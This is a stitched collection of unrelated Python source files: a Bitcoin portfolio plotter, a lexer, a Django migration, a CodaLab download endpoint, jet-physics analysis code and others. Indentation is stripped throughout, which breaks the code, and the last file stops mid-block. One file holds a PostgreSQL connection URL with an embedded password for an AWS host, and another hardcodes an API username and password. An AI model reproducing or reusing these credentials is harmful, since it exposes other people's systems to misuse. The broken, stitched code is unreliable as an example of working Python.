r.append(rates.getRate(args.symbol, ts))
fig = plot.figure()
ax = fig.add_subplot(111)
plot.xticks( rotation=25 )
xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S')
ax.xaxis.set_major_formatter(xfmt)
ax.plot(timestamps, r, 'ks-', label="Rate")
ax.legend(loc=1)
if args.symbol == "BITCOIN":
plot.show()
sys.exit(0)
d = s.getDividend()
timestampsDividend = []
dividends = []
ax2 = ax.twinx()
for dividend in d:
ts = dividend.getTimestamp()
timestampsDividend.append(datetime.datetime.fromtimestamp(ts))
havelock.setEndDate(ts)
qt = s.getShareQuantity()
div = dividend.getAmount()
perShare = div / float(qt)
#dividends.append(dividend.getAmount())
#print "{:d} shares, dividend {:f}, per Share {:f}".format(qt, div, perShare)
dividends.append(perShare)
ax2.axvline(x=timestampsDividend[-1], ymin=0, ymax=1)
ax2.plot(timestampsDividend, dividends, 'bs-', label="Dividend per Share")
ax2.legend(loc=2)
plot.show()
sys.exit(0)
# debug win / loss shit
# all symbols
analyse = havelock.portfolio.getSymbols().keys()
dates = havelock.transactions.getTimestamps()
des = []
yes = {}
xes = {}
dxes = {}
for sym in analyse:
yes[sym] = []
xes[sym] = []
dxes[sym] = []
btcX = []
btcY = []
wins = []
bwins = []
btcCount = []
cnt = 0
symbols = havelock.portfolio.getSymbols().values()
depotMode = None
oldDepositValue = 0.0
oldWithdrawValue = 0.0
reduceBtc=0.0
for d in dates:
ds = datetime.datetime.fromtimestamp(d)
des.append(ds)
#print "{:d} transactions until {:s}:".format(cnt, ds.strftime("%Y-%m-%d %H:%M:%s"))
havelock.setEndDate(d)
deposit = havelock.transactions.getDepositAmount()
if deposit != oldDepositValue:
reduceBtc = deposit-oldDepositValue
#print "{:d} entering deposit mode, deposit {:f} btc to havelock".format(cnt, reduceBtc)
oldDepositValue = deposit
depotMode = True
bitcoin.setEndDate(d)
val = 0.0
por = 0.0
for sym in symbols:
name = sym.getName()
if name not in analyse:
continue
amount = sym.getShareQuantity()
rate = rates.getRate(name, d)
book = sym.getBookAmount()
div = sym.getDividendAmount()
cur = amount * rate
win = cur - book + div
val += win
por += cur
if amount != 0:
yes[name].append(win)
xes[name].append(d)
dxes[name].append(ds)
withdraw = bitcoin.transactions.getWithdrawAmount()
if withdraw != oldWithdrawValue:
diff = withdraw-oldWithdrawValue
#print "{:d} withdraw {:f} btc from bitcoin.de".format(cnt, diff)
oldWithdrawValue = withdraw
if (reduceBtc - diff) < 0.0001 and (reduceBtc - diff) > -0.0001:
depotMode = False
reduceBtc = 0.0
btc = rates.getRate("BITCOIN", d)
btcBalance = bitcoin.getBalance()
btcCount.append(btcBalance+havelock.getBalance(False)+por-reduceBtc)
invest = bitcoin.getInvest()
bwin = ((btcBalance-reduceBtc) * btc) + (por * btc) + invest
bwins.append(bwin)
btcX.append(ds)
btcY.append(btc)
wins.append(val) #havelock.getBalance(False) + val)
cnt += 1
ts = int(time.mktime(datetime.datetime.strptime(args.start_time, "%Y-%m-%d").timetuple()))
fig = plot.figure()
ax = fig.add_subplot(121)
colors = ["b-", "g-", "r-", "c-", "m-", "y-", "k-"]
ci = 0
plot.xticks( rotation=25 )
xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S')
ax.xaxis.set_major_formatter(xfmt)
for sym in analyse:
start = -1
for (i, x) in enumerate(xes[sym]):
if x > ts:
start = i
break
if start != -1:
ax.plot(dxes[sym][start:], yes[sym][start:], colors[ci], label=sym)
ci = (ci+1)%len(colors)
start = 0
for (i,x) in enumerate(dates):
if x > ts:
start = i
break
ax.plot(des[start:], wins[start:], 'ko-', label='win')
ax.legend(loc=3)
ax_1 = ax.twinx()
ax_1.plot(des[start:], btcCount[start:], 'yx-', label="BTCs")
ax_1.legend(loc=4)
ax2 = fig.add_subplot(122)#ax.twinx()
ax2.xaxis.set_major_formatter(xfmt)
plot.xticks( rotation=25 )
ax2.plot(btcX[start:], btcY[start:], 'bs-', label="BTC price")
ax2.legend(loc=3)
ax3 = ax2.twinx()
ax3.plot(btcX[start:], bwins[start:], 'rs-', label="total win")
ax3.legend(loc=1)
plot.show()
sys.exit(0)
|
class Config:
# DB_URL = "sqlite:///db_test.db"
DB_URL = "postgresql://vwlxwdavxfjvuf:1c32bebadc0a765b3467ea904fc4a8e9f7ee3453c26ed215503d9a5e4f20993d@ec2-52-2-82-109.compute-1.amazonaws.com/d7pjfkh1cgosoi"
|
import streamreader
import state
from orderedcollections import *
class Scanner:
def __init__(
self,
instream=None,
startStateId=None,
states={},
classes={},
keywords={},
identifierTokenId=-1,
eatComments=False,
commentTokenId=-1,
):
# The use of dict below creates a copy of the default parameter because
# only one copy of default parameters is created and if multiple scanner
# objects were created this would be a problem... for Python...
self.states = dict(states)
self.classes = dict(classes)
self.startStateId = startStateId
self.reader = streamreader.StreamReader(instream)
self.keywords = dict(keywords)
self.identiferTokenId = identifierTokenId
self.eatComments = eatComments
self.commentTokenId = commentTokenId
for stateId in states:
states[stateId].setClasses(classes)
def getToken(self):
# Here the getToken method must skip whitespace and then run the finite state machine starting with self.startStateId.
# The finite state machine is an infinite loop of getting characters from the reader and transitioning between states.
# The getToken method returns a tuple of (tokenId, lex) where tokenId is the token Identifier from the state or from the
# map of keywords if the lexeme is in the keyword map.
# If a transition is not found, then an exception can be raised like this.
# raise Exception("Bad Token '"+lex+"' found at line " + str(self.reader.getLineNumber()) + " and column " + str(self.reader.getColNumber()) + ".")
self.reader.skipWhiteSpace()
currentStateId = self.startStateId
lex = ""
while True:
currentState = self.states[currentStateId]
# get character
ch = self.reader.readChar()
# look for trans on that char from the current state
currentStateId = currentState.onGoTo(ord(ch))
if currentStateId == state.NoTransition:
if currentState.isAccepting():
self.reader.unreadChar(ch)
return (currentState.getAcceptsTokenId(), lex)
raise Exception(
"Bad Token '"
+ lex
+ "' found at line "
+ str(self.reader.getLineNumber())
+ " and column "
+ str(self.reader.getColNumber())
+ "."
)
else:
lex += ch
# return(0, ch)
|
# Generated by Django 3.0.5 on 2020-06-03 18:36
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pessoas', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ProfileUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('profile', models.ImageField(null=True, upload_to='user-profile/%d/%m/%Y/')),
('name', models.CharField(max_length=200)),
('email', models.EmailField(max_length=200, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.DeleteModel(
name='Pessoa',
),
]
|
import httplib
import mimetypes
from bottle import abort, get, local, request, response
from codalab.lib import spec_util, zip_util
from codalab.objects.permission import check_bundles_have_read_permission
@get('/bundle/<uuid:re:%s>/contents/blob/' % spec_util.UUID_STR)
@get('/bundle/<uuid:re:%s>/contents/blob/<path:path>' % spec_util.UUID_STR)
def get_blob(uuid, path=''):
"""
API to download the contents of a bundle or a subpath within a bundle.
For directories this method always returns a tarred and gzipped archive of
the directory.
For files, if the request has an Accept-Encoding header containing gzip,
then the returned file is gzipped.
"""
check_bundles_have_read_permission(local.model, request.user, [uuid])
bundle = local.model.get_bundle(uuid)
target_info = local.download_manager.get_target_info(uuid, path, 0)
if target_info is None:
abort(httplib.NOT_FOUND, 'Not found.')
# Figure out the file name.
if not path and bundle.metadata.name:
filename = bundle.metadata.name
else:
filename = target_info['name']
if target_info['type'] == 'directory':
# Always tar and gzip directories.
filename = filename + '.tar.gz'
fileobj = local.download_manager.stream_tarred_gzipped_directory(uuid, path)
elif target_info['type'] == 'file':
if not zip_util.path_is_archive(filename) and request_accepts_gzip_encoding():
# Let's gzip to save bandwidth. The browser will transparently decode
# the file.
filename = filename + '.gz'
fileobj = local.download_manager.stream_file(uuid, path, gzipped=True)
else:
fileobj = local.download_manager.stream_file(uuid, path, gzipped=False)
else:
# Symlinks.
abort(httplib.FORBIDDEN, 'Cannot download files of this type.')
# Set headers.
mimetype, _ = mimetypes.guess_type(filename, strict=False)
response.set_header('Content-Type', mimetype or 'text/plain')
if zip_util.get_archive_ext(filename) == '.gz' and request_accepts_gzip_encoding():
filename = zip_util.strip_archive_ext(filename)
response.set_header('Content-Encoding', 'gzip')
else:
response.set_header('Content-Encoding', 'identity')
response.set_header('Content-Disposition', 'filename="%s"' % filename)
return fileobj
def request_accepts_gzip_encoding():
# See rules for parsing here: https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
# Browsers silently decode gzipped files, so we save some bandwidth.
if 'Accept-Encoding' not in request.headers:
return False
for encoding in request.headers['Accept-Encoding'].split(','):
encoding = encoding.strip().split(';')
if encoding[0] == 'gzip':
if len(encoding) > 1 and encoding[1] == 'q=0':
return False
else:
return True
return False
|
from base import add, createSkeleton
# Additional functions
def addToArmy(data, army, id):
if (len(data) == 3):
(name, health, damage) = tuple(data)
add(createSkeleton(name, id, int(health), int(damage)), army)
elif (len(data) == 1):
add(createSkeleton(data[0], id), army)
print('Unit added')
def printSkeleton(skeleton):
print('skeletonID - ', skeleton['id'])
print('Name - ', skeleton['name'])
print('Health - ', skeleton['health'])
print('Damage - ', skeleton['damage'])
def printArmy(army):
for unit in army:
print('\n')
printSkeleton(unit)
print('\n---------------')
|
import requests
import logging
SESSION = requests.Session()
APP_URL = 'https://qa-interview-api.migo.money'
USER = 'egg'
PASSWORD = 'f00BarbAz'
LOG = logging.getLogger()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 18 16:47:25 2017
@author: dgratz
"""
import numpy as np
import itertools
import math
import matplotlib.pyplot as plt
from scipy import signal
import matplotlib
from collections import deque
def calcSync(vVal,vTime):
syncT = np.zeros(vTime.shape[0])
syncV = np.zeros(vVal.shape[0])
for i in range(vTime.shape[0]):
syncT[i] = np.std(vTime[i,:])
syncV[i] = np.std(vVal[i,:])
return syncT,syncV
def distance(p1,p2):
return math.hypot(p2[0] - p1[0], p2[1] - p1[1])
def manhatDist(p):
p1,p2 = p
return abs(p1[0]-p2[0])+abs(p1[1]-p2[1])
def addCells(cells):
newCells = set()
for cell in cells:
newCells.add((cell[0]+1,cell[1]))
newCells.add((cell[0]-1,cell[1]))
newCells.add((cell[0],cell[1]+1))
newCells.add((cell[0],cell[1]-1))
return newCells.union(cells)
def smallestDistCells(cells):
cellList = list(cells)
cellsDists = [{c} for c in cellList]
while not any(map(lambda cd: len(cd.intersection(cells))>1,cellsDists)):
for i in range(len(cellsDists)):
cellsDists[i] = addCells(cellsDists[i])
pairs = set()
for cell,cellDist in zip(cellList,cellsDists):
for pair in cellDist.intersection(cells)-set([cell]):
pairs.add(frozenset([cell,pair]))
return set(map(lambda x: tuple(x),pairs))
def argmins(beatCells):
minVal = None
minsPos = []
for pos,elem in enumerate(nl):
if minVal is None:
minVal = elem
minsPos.append(pos)
elif minVal == elem:
minsPos.append(pos)
elif elem < minVal:
minsPos = [pos]
return minsPos
def tDiff(cs,times,poses):
c1,c2 = cs
return abs(times[poses.index(c1)]-times[poses.index(c2)])
def calcTimeSync(vVal,vTime,nextBeatDist=3):
tVals = np.concatenate(tuple(arr for col in vTime for arr in col))
vVals = np.concatenate(tuple(arr for col in vVal for arr in col))
badData = []
for i in range(len(vVals)):
if vVals[i] < 0:
badData.append(i)
tVals = np.delete(tVals,badData)
vVals = np.delete(vVals,badData)
sortedPos = tVals.argsort()
tVals = tVals[sortedPos]
cells = []
for cn,col in enumerate(vVal):
for rn,arr in enumerate(col):
cells += [(rn,cn)]*len(arr)
cells = [cells[ind] for ind in sortedPos]
beatLists = []
currentBeatSets = []
currentBeatLists = []
for i,cell in enumerate(cells):
removeCBS = None
potentials = []
for j,CBS in enumerate(currentBeatSets):
if cell in CBS:
removeCBS = j
elif any(map(lambda c: manhatDist((cell,c)) <= nextBeatDist,CBS)):
potentials.append((j,len(currentBeatSets[j])))
ML = max(potentials,key=lambda x: x[1]) if len(potentials) > 0 else None
if ML is not None:
currentBeatSets[ML[0]].add(cell)
currentBeatLists[ML[0]].append(i)
else:
currentBeatSets.append(set([cell]))
currentBeatLists.append([i])
if removeCBS is not None:
beatLists.append(currentBeatLists[removeCBS])
del currentBeatSets[removeCBS]
del currentBeatLists[removeCBS]
syncT = []
syncV = []
times = []
for beatList in beatLists:
# syncT.append(np.std(tVals[beatList]))
if len(beatList) < 2:
continue
beatCellsL = [cells[c] for c in beatList]
beatCells = set(beatCellsL)
smCells = smallestDistCells(beatCells)
smCellsL = list(smCells)
vals = list(map(lambda am: tDiff(am,tVals[beatList],beatCellsL),smCellsL))
aM = np.argmax(vals)
syncT.append(vals[aM])
syncV.append(np.std(vVals[beatList]))
times.append(np.mean(tVals[beatList]))
times,syncT,syncV = np.array(times),np.array(syncT),np.array(syncV)
sortedArgs = times.argsort()
times = times[sortedArgs]
syncT = syncT[sortedArgs]
return times,syncT,syncV
def calcSyncVarLen(vVal,vTime):
tVals = np.concatenate(tuple(arr for col in vTime for arr in col))
vVals = np.concatenate(tuple(arr for col in vVal for arr in col))
badData = []
for i in range(len(vVals)):
if vVals[i] < 0:
badData.append(i)
tVals = np.delete(tVals,badData)
vVals = np.delete(vVals,badData)
sortedPos = tVals.argsort()
tVals = tVals[sortedPos]
vVals = vVals[sortedPos]
cells = []
for cn,col in enumerate(vVal):
for rn,arr in enumerate(col):
cells += [(rn,cn)]*len(arr)
cells = [cells[ind] for ind in sortedPos]
mhatDistCells = np.zeros(len(cells)-1)
for i in range(len(cells)-1):
mhatDistCells[i] = manhatDist((cells[i],cells[i+1]))
# plt.plot(mhatDistCells)
beatSets = []
foundCells = set()
begin = 0
for i,cell in enumerate(cells):
if cell in foundCells and len(foundCells) >= 2:
beatSets.append(slice(begin,i))
begin += cells[begin:i].index(cell)+1
foundCells = set(cells[begin:i+1])
else:
foundCells.add(cell)
syncT = []
syncV = []
times = []
beatSetNum = 0
i = 0
while i < len(cells) and beatSetNum < len(beatSets):
minBeatSet = beatSetNum
minBeatSetVal = 0
while beatSetNum < len(beatSets) and beatSets[beatSetNum].start <= i and i < beatSets[beatSetNum].stop:
beatSetVal = np.mean(mhatDistCells[beatSets[beatSetNum]])
if beatSetVal < minBeatSetVal:
minBeatSetVal = beatSetVal
minBeatSet = beatSetNum
beatSetNum += 1
begin = beatSets[minBeatSet].start
end = beatSets[minBeatSet].stop
beatCells = set(cells[begin:end])
smCells = smallestDistCells(beatCells)
# distances = np.array([distance(cells[pos],cells[begin]) for pos in range(begin+1,i)])
smCellsL = list(smCells)
vals = list(map(lambda am: tDiff(am,tVals[begin:end],cells[begin:end]),smCellsL))
aM = np.argmax(vals)
# print(tVals[begin],tVals[begin:i][cells[begin:i].index(p[0])])
# syncT.append(np.max((tVals[begin+1:i]-tVals[begin])/(distances))/len(foundCells))
# syncT.append(vals[aM])
syncT.append(np.std(vals))
syncV.append(np.std(vVals[begin:end]))
times.append(np.mean(tVals[begin:end]))
i = end
while beatSetNum < len(beatSets) and beatSets[beatSetNum].start <= i-1 and i-1 < beatSets[beatSetNum].stop:
beatSetNum += 1
# plt.plot([begin,end],[8,7])
# plt.figure()
return np.array(times),np.array(syncT),np.array(syncV)
|
import unittest
from katas.kyu_6.find_the_divisors import divisors
class FindTheDivisorsTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(divisors(12), [2, 3, 4, 6])
def test_equals_2(self):
self.assertEqual(divisors(25), [5])
def test_equals_3(self):
self.assertEqual(divisors(13), '13 is prime')
def test_equals_4(self):
self.assertEqual(divisors(15), [3, 5])
|
from os.path import join, expanduser, dirname
"""
Global config options
"""
DATA_DIR = "/data3/private/liujiahua/new/data"
TRANS_DATA_DIR = "/data1/private/liujiahua"
NEW_EN = join(DATA_DIR, "en")
NEW_EN_TRANS_DE = join(TRANS_DATA_DIR, "_wiki_data_en/translate_de")
NEW_EN_TRANS_ZH = join(TRANS_DATA_DIR, "_wiki_data_en/translate_zh")
NEW_FR_TRANS = join(TRANS_DATA_DIR, "wiki_data_fr/translate_en")
NEW_DE_TRANS = join(TRANS_DATA_DIR, "wiki_data_de/translate_en")
NEW_RU_TRANS = join(TRANS_DATA_DIR, "wiki_data_ru/translate_en")
NEW_PT_TRANS = join(TRANS_DATA_DIR, "wiki_data_pt/translate_en")
NEW_ZH_TRANS = join(TRANS_DATA_DIR, "wiki_data_zh/translate_en")
NEW_PL_TRANS = join(TRANS_DATA_DIR, "wiki_data_pl/translate_en")
NEW_UK_TRANS = join(TRANS_DATA_DIR, "wiki_data_uk/translate_en")
NEW_TA_TRANS = join(TRANS_DATA_DIR, "wiki_data_ta/translate_en")
NEW_FR_ORI = join(DATA_DIR, "fr")
NEW_DE_ORI = join(DATA_DIR, "de")
NEW_RU_ORI = join(DATA_DIR, "ru")
NEW_PT_ORI = join(DATA_DIR, "pt")
NEW_ZH_ORI = join(DATA_DIR, "zh")
NEW_PL_ORI = join(DATA_DIR, "pl")
NEW_UK_ORI = join(DATA_DIR, "uk")
NEW_TA_ORI = join(DATA_DIR, "ta")
CORPUS_NAME_TO_PATH = {
"en": NEW_EN,
"en_trans_de": NEW_EN_TRANS_DE,
"en_trans_zh": NEW_EN_TRANS_ZH,
"fr_trans_en": NEW_FR_TRANS,
"de_trans_en": NEW_DE_TRANS,
"ru_trans_en": NEW_RU_TRANS,
"pt_trans_en": NEW_PT_TRANS,
"zh_trans_en": NEW_ZH_TRANS,
"pl_trans_en": NEW_PL_TRANS,
"uk_trans_en": NEW_UK_TRANS,
"ta_trans_en": NEW_TA_TRANS,
"fr": NEW_FR_ORI,
"de": NEW_DE_ORI,
"ru": NEW_RU_ORI,
"pt": NEW_PT_ORI,
"zh": NEW_ZH_ORI,
"pl": NEW_PL_ORI,
"uk": NEW_UK_ORI,
"ta": NEW_TA_ORI,
}
CORPUS_DIR = join(dirname(__file__), "data")
|
import wsdm.ts.helpers.persons.persons as p_lib
from wsdm.ts.helpers.tfidf.professions_tfidf_dictionary import PROFESSIONS_DICT
from wsdm.ts.helpers.tfidf.nationalities_tfidf_dictionary import NATIONALITIES_DICT
import os
import definitions
from collections import Counter
import operator
import re
def split_into_sentences(text):
caps = "([A-Z])"
prefixes = "(Mr|St|Mrs|Ms|Dr)[.]"
suffixes = "(Inc|Ltd|Jr|Sr|Co)"
starters = "(Mr|Mrs|Ms|Dr|He\s|She\s|It\s|They\s|Their\s|Our\s|We\s|But\s|However\s|That\s|This\s|Wherever)"
acronyms = "([A-Z][.][A-Z][.](?:[A-Z][.])?)"
websites = "[.](com|net|org|io|gov)"
text = " " + text + " "
text = text.replace("\n"," ")
text = re.sub(prefixes,"\\1<prd>",text)
text = re.sub(websites,"<prd>\\1",text)
if "Ph.D" in text: text = text.replace("Ph.D.","Ph<prd>D<prd>")
text = re.sub("\s" + caps + "[.] "," \\1<prd> ",text)
text = re.sub(acronyms+" "+starters,"\\1<stop> \\2",text)
text = re.sub(caps + "[.]" + caps + "[.]" + caps + "[.]","\\1<prd>\\2<prd>\\3<prd>",text)
text = re.sub(caps + "[.]" + caps + "[.]","\\1<prd>\\2<prd>",text)
text = re.sub(" "+suffixes+"[.] "+starters," \\1<stop> \\2",text)
text = re.sub(" "+suffixes+"[.]"," \\1<prd>",text)
text = re.sub(" " + caps + "[.]"," \\1<prd>",text)
if "”" in text: text = text.replace(".”","”.")
if "\"" in text: text = text.replace(".\"","\".")
if "!" in text: text = text.replace("!\"","\"!")
if "?" in text: text = text.replace("?\"","\"?")
text = text.replace(".",".<stop>")
text = text.replace("?","?<stop>")
text = text.replace("!","!<stop>")
text = text.replace("<prd>",".")
sentences = text.split("<stop>")
sentences = sentences[:-1]
sentences = [s.strip() for s in sentences]
return sentences
def custom_similarity(person, key, words_dict):
result = 0
person_file = os.path.join(definitions.PERSONS_DIR, p_lib.remove_spaces(person) + ".txt")
if os.path.isfile(person_file):
with open(person_file, 'r', encoding='utf8') as fr:
tfidf_words = words_dict[key]
sorted_tfidf_words = sorted(tfidf_words.items(), key=operator.itemgetter(1))
max_weight = sorted_tfidf_words[-1][1]
file_content = fr.read()
person_words = p_lib.split_to_words(file_content.lower())
document_dict = Counter(person_words)
sentences_count = len(split_into_sentences(file_content))
for word in tfidf_words:
current_word_weight = tfidf_words[word] / max_weight
if word in document_dict:
result += document_dict[word] * current_word_weight
if sentences_count == 0:
sentences_count = 1
result = result / sentences_count
result *= 55
if result > 7:
return 7
return result
def find_similarity(person_name, term, inputType):
if inputType == definitions.TYPE_NATIONALITY:
dict = NATIONALITIES_DICT
elif inputType == definitions.TYPE_PROFESSION:
dict = PROFESSIONS_DICT
else:
raise TypeError
return custom_similarity(person_name, term, dict)
|
#!/usr/bin/env python3
#test_completion.py
#*
#* --------------------------------------------------------------------------
#* Licensed under MIT (https://git.biohpc.swmed.edu/gudmap_rbk/rna-seq/-/blob/14a1c222e53f59391d96a2a2e1fd4995474c0d15/LICENSE)
#* --------------------------------------------------------------------------
#*
import pytest
import pandas as pd
from io import StringIO
import os
import json
test_output_path = os.path.dirname(os.path.abspath(__file__)) + \
'/../../'
@pytest.mark.completionMultiqc
def test_multiqcExist(filename):
assert os.path.exists(os.path.join(
test_output_path, filename))
|
# -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from ragendja.template import render_to_response
def staff_only(view):
"""
Decorator that requires user.is_staff. Otherwise renders no_access.html.
"""
@login_required
def wrapped(request, *args, **kwargs):
if request.user.is_active and request.user.is_staff:
return view(request, *args, **kwargs)
return render_to_response(request, 'no_access.html')
return wrapped
def redirect_to_google_login(next, login_url=None, redirect_field_name=None):
from google.appengine.api import users
return HttpResponseRedirect(users.create_login_url(next))
def google_login_required(function):
def login_required_wrapper(request, *args, **kw):
if request.user.is_authenticated():
return function(request, *args, **kw)
return redirect_to_google_login(request.get_full_path())
return login_required_wrapper
|
#!/usr/bin/env python
from __future__ import print_function
import fastjet as fj
import fjcontrib
import fjext
import ROOT
import tqdm
import yaml
import copy
import argparse
import os
from pyjetty.mputils import *
from heppy.pythiautils import configuration as pyconf
import pythia8
import pythiafjext
import pythiaext
from pyjetty.alice_analysis.process.base import process_base
from pyjetty.alice_analysis.process.user.ang.helpers import lambda_alpha_kappa_i
from array import array
import numpy as np
# Prevent ROOT from stealing focus when plotting
ROOT.gROOT.SetBatch(True)
# Automatically set Sumw2 when creating new histograms
ROOT.TH1.SetDefaultSumw2()
################################################################
class pythia_parton_hadron(process_base.ProcessBase):
#---------------------------------------------------------------
# Constructor
#---------------------------------------------------------------
def __init__(self, input_file='', config_file='', output_dir='',
debug_level=0, args=None, **kwargs):
super(pythia_parton_hadron, self).__init__(
input_file, config_file, output_dir, debug_level, **kwargs)
self.initialize_config(args)
#---------------------------------------------------------------
# Main processing function
#---------------------------------------------------------------
def pythia_parton_hadron(self, args):
# Create ROOT TTree file for storing raw PYTHIA particle information
outf_path = os.path.join(self.output_dir, args.tree_output_fname)
outf = ROOT.TFile(outf_path, 'recreate')
outf.cd()
# Initialize response histograms
self.initialize_hist()
pinfo('user seed for pythia', self.user_seed)
# mycfg = ['PhaseSpace:pThatMin = 100']
mycfg = ['Random:setSeed=on', 'Random:seed={}'.format(self.user_seed)]
mycfg.append('HadronLevel:all=off')
# PYTHIA instance with MPI off
setattr(args, "py_noMPI", True)
pythia = pyconf.create_and_init_pythia_from_args(args, mycfg)
# print the banner first
fj.ClusterSequence.print_banner()
print()
self.init_jet_tools()
self.calculate_events(pythia)
pythia.stat()
print()
# PYTHIA instance with MPI on
setattr(args, "py_noMPI", False)
pythia_MPI = pyconf.create_and_init_pythia_from_args(args, mycfg)
self.calculate_events(pythia_MPI, MPIon=True)
print()
if not self.no_tree:
for jetR in self.jetR_list:
getattr(self, "tw_R%s" % str(jetR).replace('.', '')).fill_tree()
self.scale_print_final_info(pythia, pythia_MPI)
outf.Write()
outf.Close()
self.save_output_objects()
#---------------------------------------------------------------
# Initialize config file into class members
#---------------------------------------------------------------
def initialize_config(self, args):
# Call base class initialization
process_base.ProcessBase.initialize_config(self)
# Read config file
with open(self.config_file, 'r') as stream:
config = yaml.safe_load(stream)
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
# Defaults to None if not in use
self.level = args.no_match_level
self.jetR_list = config["jetR"]
self.user_seed = args.user_seed
self.nev = args.nev
self.observable_list = config["process_observables"]
self.obs_settings = {}
self.obs_grooming_settings = {}
self.obs_names = {}
for obs in self.observable_list:
obs_config_dict = config[obs]
obs_config_list = [name for name in list(obs_config_dict.keys()) if 'config' in name ]
obs_subconfig_list = [name for name in list(obs_config_dict.keys()) if 'config' in name ]
self.obs_settings[obs] = self.utils.obs_settings(
obs, obs_config_dict, obs_subconfig_list)
self.obs_grooming_settings[obs] = self.utils.grooming_settings(obs_config_dict)
self.obs_names[obs] = obs_config_dict["common_settings"]["xtitle"]
# Construct set of unique grooming settings
self.grooming_settings = []
lists_grooming = [self.obs_grooming_settings[obs] for obs in self.observable_list]
for observable in lists_grooming:
for setting in observable:
if setting not in self.grooming_settings and setting != None:
self.grooming_settings.append(setting)
# Manually added binnings for RM and scaling histograms
self.pt_bins = array('d', list(range(5, 210, 5)))
self.obs_bins_ang = np.concatenate((np.linspace(0, 0.0009, 10), np.linspace(0.001, 0.009, 9),
np.linspace(0.01, 0.1, 19), np.linspace(0.11, 1., 90)))
self.obs_bins_mass = np.concatenate(
(np.linspace(0, 0.9, 10), np.linspace(1, 9.8, 45), np.linspace(10, 14.5, 10),
np.linspace(15, 19, 5), np.linspace(20, 60, 9)))
# hadron level - ALICE tracking restriction
self.max_eta_hadron = 0.9
# Whether or not to rescale final jet histograms based on sigma/N
self.no_scale = args.no_scale
# Whether or not to save particle info in raw tree structure
self.no_tree = args.no_tree
#---------------------------------------------------------------
# Initialize histograms
#---------------------------------------------------------------
def initialize_hist(self):
self.hNevents = ROOT.TH1I("hNevents", 'Number accepted events (unscaled)', 2, -0.5, 1.5)
self.hNeventsMPI = ROOT.TH1I("hNeventsMPI", 'Number accepted events (unscaled)', 2, -0.5, 1.5)
for jetR in self.jetR_list:
# Store a list of all the histograms just so that we can rescale them later
hist_list_name = "hist_list_R%s" % str(jetR).replace('.', '')
setattr(self, hist_list_name, [])
hist_list_name_MPIon = "hist_list_MPIon_R%s" % str(jetR).replace('.', '')
setattr(self, hist_list_name_MPIon, [])
R_label = "R" + str(jetR).replace('.', '') + 'Scaled'
for MPI in ["", "MPIon_"]:
R_label = MPI + R_label
list_name = hist_list_name_MPIon if MPI else hist_list_name
if self.level in [None, 'ch']:
name = 'hJetPt_ch_%s' % R_label
h = ROOT.TH1F(name, name+';p_{T}^{ch jet};#frac{dN}{dp_{T}^{ch jet}};', 300, 0, 300)
h.Sumw2() # enables calculation of errors
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hNconstit_Pt_ch_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{ch jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{ch jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
if self.level in [None, 'h']:
name = 'hJetPt_h_%s' % R_label
h = ROOT.TH1F(name, name+';p_{T}^{jet, h};#frac{dN}{dp_{T}^{jet, h}};', 300, 0, 300)
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hNconstit_Pt_h_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{h jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{h jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
if self.level in [None, 'p']:
name = 'hJetPt_p_%s' % R_label
h = ROOT.TH1F(name, name+';p_{T}^{jet, parton};#frac{dN}{dp_{T}^{jet, parton}};',
300, 0, 300)
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hNconstit_Pt_p_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{p jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{p jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
if self.level == None:
name = 'hJetPtRes_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 200, -1., 1.)
h.GetXaxis().SetTitle('#it{p}_{T}^{parton jet}')
h.GetYaxis().SetTitle(
'#frac{#it{p}_{T}^{parton jet}-#it{p}_{T}^{ch jet}}{#it{p}_{T}^{parton jet}}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hResponse_JetPt_%s' % R_label
h = ROOT.TH2F(name, name, 200, 0, 200, 200, 0, 200)
h.GetXaxis().SetTitle('#it{p}_{T}^{parton jet}')
h.GetYaxis().SetTitle('#it{p}_{T}^{ch jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
'''
# Jet multiplicity for matched jets with a cut at ch-jet level
name = 'hNconstit_Pt_ch_PtBinCH60-80_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{ch jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{ch jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hNconstit_Pt_h_PtBinCH60-80_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{h jet}')
